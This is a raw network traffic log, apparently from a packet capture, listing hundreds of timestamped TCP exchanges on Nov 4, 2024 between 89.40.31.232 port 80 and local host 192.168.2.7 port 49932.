                                                              Nov 4, 2024 09:27:58.896604061 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896617889 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896631956 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896641016 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896646976 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896656036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896694899 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896725893 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896739006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896750927 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896759987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896763086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896775961 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896778107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896791935 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896804094 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896833897 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896866083 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896878004 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896893978 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896910906 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896914959 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896927118 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896941900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896950006 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896955013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896962881 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896991014 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.897023916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.897037029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.897049904 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.897063971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.897069931 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.897079945 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.897100925 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.897116899 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.897972107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898013115 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898150921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898164034 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898175955 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898185015 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898189068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898200035 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898202896 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898216009 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898216963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898237944 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898262024 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898631096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898677111 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898792028 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898803949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898817062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898823977 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898830891 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898840904 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898844957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898858070 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898859024 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898873091 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898889065 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898947001 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898958921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898973942 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.898981094 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.898987055 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899003029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899008989 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.899017096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899032116 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.899095058 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899108887 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899112940 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.899122953 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899132013 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.899138927 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899153948 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899156094 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.899168015 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899172068 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.899198055 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.899230957 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.899260044 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899272919 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899285078 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899295092 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.899298906 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899311066 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.899321079 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.899328947 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.899355888 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.925618887 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.925647020 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.925661087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.925673962 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.925688028 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.925728083 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.925779104 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.969460011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.969481945 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.969495058 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.969547033 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.969563961 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.969577074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.969592094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.969604015 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.969619036 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.969628096 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.969657898 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.969657898 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.990566969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990580082 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990598917 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990621090 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990623951 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.990633011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990645885 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990648985 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.990664959 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990686893 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990691900 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.990700006 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.990700006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990714073 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990731001 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.990750074 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.990797043 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990818024 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990828991 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990853071 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.990873098 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.990876913 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990890980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990911007 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990921021 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990933895 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.990956068 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.990959883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990978956 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.990997076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991003036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991010904 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991029024 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991059065 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991077900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991091013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991103888 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991122961 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991156101 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991214991 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991226912 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991250038 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991264105 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991265059 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991276026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991290092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991290092 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991305113 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991324902 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991328955 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991338015 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991352081 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991353989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991363049 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991369963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991394997 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991426945 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991446972 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991458893 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991470098 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991487980 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991496086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991513014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991516113 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991533995 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991542101 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991561890 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991580963 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991581917 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991596937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991609097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991622925 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991662025 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991662025 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991691113 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991704941 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991715908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991729021 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991744995 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991751909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991765022 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991775990 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991795063 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991830111 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991859913 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991873980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991885900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991899967 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991911888 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991914988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991929054 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991935015 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991942883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.991955042 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.991983891 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992022991 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992073059 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992111921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992125988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992139101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992151022 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992156982 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992162943 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992172003 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992183924 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992196083 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992201090 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992209911 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992223024 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992223978 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992234945 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992249012 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992249966 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992261887 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992275000 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992284060 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992291927 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992299080 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992311954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992314100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992332935 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992351055 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992908001 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992921114 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992933989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992976904 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.992980003 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992988110 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.992990971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.993002892 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.993029118 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.993078947 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.993110895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.993125916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.993135929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.993158102 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.993201971 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.008580923 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008636951 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008651972 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008663893 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.008672953 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008681059 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.008686066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008698940 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008701086 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.008713007 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008714914 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.008738995 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.008780003 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.008819103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008831978 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008841991 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008855104 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008866072 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.008867979 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.008893967 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.008912086 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009011030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009022951 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009032965 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009044886 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009057999 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009059906 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009071112 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009083033 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009085894 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009095907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009102106 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009109974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009123087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009130955 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009135962 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009159088 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009176970 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009248018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009259939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009270906 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009284019 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009294987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009324074 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009388924 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009402037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009419918 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009433031 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009440899 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009444952 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009458065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009459972 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009471893 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009485006 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009485006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009500980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009512901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009512901 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009521961 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009525061 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009543896 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009555101 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009577036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009602070 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009774923 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009788036 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009799957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009812117 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009825945 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009830952 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009843111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009850979 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009855032 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009871006 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009876013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009888887 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009891987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009901047 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009905100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009913921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009924889 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009924889 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009937048 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009952068 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009954929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009964943 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.009968996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009979963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.009999037 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010013103 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010152102 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010164976 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010176897 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010190010 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010200024 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010201931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010215998 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010221958 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010236025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010241985 CET4993280192.168.2.789.40.31.232
